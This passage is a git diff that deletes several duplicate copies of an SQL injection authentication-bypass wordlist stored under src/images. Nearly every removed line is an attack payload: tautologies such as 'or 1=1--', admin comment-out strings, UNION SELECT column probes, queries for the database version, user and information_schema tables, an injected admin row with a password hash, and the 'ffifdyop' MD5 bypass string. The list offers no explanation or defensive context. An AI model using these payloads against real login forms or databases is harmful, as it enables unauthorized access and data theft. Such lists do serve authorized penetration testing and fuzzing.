-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
